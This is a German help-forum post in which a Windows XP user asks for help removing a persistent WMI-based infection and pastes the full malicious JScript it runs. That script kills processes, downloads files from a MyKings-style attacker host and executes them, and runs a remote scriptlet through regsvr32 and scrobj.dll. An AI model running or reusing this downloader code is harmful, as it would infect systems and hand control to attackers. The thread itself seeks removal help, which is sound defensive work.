| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
23.05.2017, 12:27
| #1 |
| |  ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Der Benutzername ist Programm... bitte... ich weiß nicht mehr was ich machen soll. Windowx XP So... seit 3 Tagen versuche ich dieses elende Drecksteil los zu werden. Es kommt aber nach mehreren Stunden IMMER wieder vollkommen unabhängig von dem was ich gerade tue. Es wird NICHT!!! von Malwarebytes/DrWeb/ADWCleaner usw erkannt. Ich kann es mit Hilfe von dem Progi Autoruns in der Spalte WMI löschen wenn es wieder erscheint. fuckyoumm2_consumer Das script sieht so aus: Code:
ATTFilter var toff=3000;var url1 = "hxxp://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="hxxp://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Momentan zeigt die nur: (Tue May 23 12:09:43 2017.8649656) : NT Event Log Consumer: could not retrieve sid, 0x80041002 Seid heute 9 Uhr ist das Script nicht mehr aufgegangen... Ich denke aber das es immer noch da ist da ich KEINE antivirus Seite öffnen kann. virustotal, drweb, malwarebytes egal was ich bekomme immer nur: Fehler: Server nicht gefunden Alle anderen Seiten funktionieren wie immer. In der Windows Firewall bei Ausnahmen ist ein Eintrag mit ahpobx erschienen. Port: 9589 TCP Löschen hilft nicht da es nach einem Neustart immer wieder kommt. Ich habe nun einfach den Port auf 1 geändert (Was auch noch nicht wieder geändert wurde) Die einzigen Programm die etwas finden (Ich mir aber nicht sicher bin ob es damit etwas zu tun hat) sind: Farbar Recovery Scan Tool & TDSSKillerTDSSKiller FRST & TDSSKiller Scan im Anhang. Ich heule jetzt weiter... Bin auch liebend gerne bereit das ganze per Telefon zu besprechen < pure Verzweiflung |
| Themen zu ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer |
| .dll, antivirus, code, datei, dll, fehler, firewall, log, löschen, neustart, nicht mehr, recovery, rundll, rundll32.exe, scan, script, seite, seiten, system32, tan, virus, win32, windows, windows firewall, wmi |
Baum-Darstellung